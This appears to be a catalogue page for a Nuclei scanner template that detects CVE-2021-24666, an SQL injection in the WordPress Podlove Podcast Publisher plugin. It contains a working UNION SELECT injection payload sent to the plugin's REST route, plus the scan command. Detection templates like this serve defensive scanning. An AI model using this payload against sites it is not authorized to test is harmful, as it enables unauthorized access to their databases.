WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection
ID: CVE-2021-24666
Severity: critical
Author: theamanrawat
Tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove
Description
Section titled “Description”WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P
YAML Source
Section titled “YAML Source”id: CVE-2021-24666
info: name: WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection author: theamanrawat severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P<id>[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe - https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/ - https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76 - https://nvd.nist.gov/vuln/detail/CVE-2021-24666 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 epss-score: 0.28174 epss-percentile: 0.96727 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: podlove product: podlove_podcast_publisher framework: wordpress tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove
http: - method: GET path: - "{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"
matchers-condition: and matchers: - type: word part: body words: - '66a82937a7660b73b00d4f7cefee6c85' - '"service_id"' condition: and
- type: word part: header words: - "application/json"
- type: status status: - 200# digest: 4b0a00483046022100d25256cafa222c40773ed80b474d3cee5517f3639c018b7bd10885a83154d93f022100b7ccc6462b3b22ef595fc0f0b2c34fc97b0e5098129d9dec1e37ba0795fe1e4d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24666.yaml"